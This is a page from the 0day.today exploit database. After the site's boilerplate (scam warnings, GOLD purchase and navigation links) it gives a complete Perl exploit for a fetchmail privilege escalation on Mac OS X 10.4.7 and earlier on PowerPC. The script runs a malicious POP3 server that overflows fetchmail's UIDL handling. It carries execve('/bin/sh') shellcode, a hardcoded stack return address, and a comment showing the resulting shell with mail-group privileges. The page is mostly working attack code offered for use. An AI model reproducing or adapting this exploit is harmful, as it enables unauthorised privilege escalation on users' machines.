0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (ppc)
=============================================================== Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (ppc) =============================================================== #!/usr/bin/perl # getpwnedmail.pl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # This is a canibalized version of "Kansas City POP Daemon Version 0.0" - Copyright (c) 1999 David Nicol <davidnicol@acm.org> # # kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234 # Enter password for kfinisterre@localhost: # sh-2.05b$ id # uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin) # # http://docs.info.apple.com/article.html?artnum=106704 use Socket; use IO::Handle; use IO::Socket; $banner = "fetchmail ppc exploit - OSX 10.4.7 8J135"; $sc = "iiii" x 10 . # * PPC MacOS X shellcode # * ghandi <ghandi@mindless.com> "\x7c\xa5\x2a\x79" . # /* xor. r5, r5, r5 ; r5 = NULL */ "\x40\xa2\xff\xfd" . # /* bnel shellcode */ "\x7f\xe8\x02\xa6" . # /* mflr r31 */ "\x3b\xff\x01\x30" . # /* addi r31, r31, 268+36 */ "\x38\x7f\xfe\xf4" . # /* addi r3, r31, -268 ; r3 = path */ "\x90\x61\xff\xf8" . # /* stw r3, -8(r1) ; argv[0] = path */ "\x90\xa1\xff\xfc" . # /* stw r5, -4(r1) ; argv[1] = NULL */ "\x38\x81\xff\xf8" . # /* subi r4, r1, 8 ; r4 = {path, 0} */ "\x3b\xc0\x76\x01" . # /* li r30, 30209 */ "\x7f\xc0\x4e\x70" . # /* srawi r0, r30, 9 */ "\x44\xff\xff\x02" . # /* sc ; execve(r3, r4, r5) */ "/bin/sh"; $eip = 0xbfffd238; # No NX to worry about so just hop right on into the stack. $malstr = "A" x 196 . pack('l', $eip) x 2; $PortNumber = 1234; $door = IO::Socket::INET->new( Proto=>'tcp', LocalPort=>$PortNumber, Listen=>SOMAXCONN, Reuse=>1 ); die "Cannot set up socket: $!" unless $door; $timeout = 60; $SIG{ALRM} = sub { die "alarm or timeout\n" }; print "open a new window and type - \"/usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234\"\n"; print "choose any password and press enter\n"; for(;;) { until( $client = $door->accept()) { sleep 1; }; $F = fork; die "Fork weirdness: $!" if $F < 0; if($F) { close $client; next; }; close ($door); $client->autoflush(); &AUTHORIZATION; &TRANSACTION; exit; }; sub OK($) { my $A = shift; $A =~ s/\s+\Z//g; print $client "+OK $A\r\n"; alarm $timeout; }; sub ERR($) { my $A = shift; $A =~ s/\s+/ /g; $A =~ s/\s+\Z//g; print $client "-ERR $A\r\n"; alarm $timeout; }; sub AUTHORIZATION { $Name = ''; OK "$banner"; NEEDUSER: $Data = <$client>; ($Name) = $Data =~ m/^user (\w+)/i; unless($Name) { ERR "The itsy bitsy spider walked up the water spout"; die if ++$strikes > 5; goto NEEDUSER; }; OK "User name ($Name) ok. Password, please."; $Data = <$client>; my($Pass) = $Data =~ m/^pass (.*)/i; $Pass =~ s/\s+\Z//g; OK "$Name has " . 8 . " messages"; }; sub TRANSACTION { %deletia = (); START: $_ = $Data = <$client>; unless(defined($Data)) { print "Client closed connection\n"; exit; }; if (m/^STAT/i){ &STAT; goto START}; if (m/^UIDL/i){ &UIDL; goto START}; # Just cram the shellcode onto the stack... ERR "Welcome to Pwndertino ! $sc"; goto START; } sub STAT { alarm 0; $mm = 0; $nn = scalar(@Messages); foreach $M (@Messages){ $mm += -s "$M"; }; OK "8 7035"; }; sub List($) { my $M = $Messages[$_[0]-1]; return if $deletia{$M}; print $client $_[0],' ',(-s $M)."\r\n"; alarm $timeout; }; sub UIDL { print "Sending exploit string\n"; OK "1 " . $malstr; }; # 0day.today [2024-11-17] #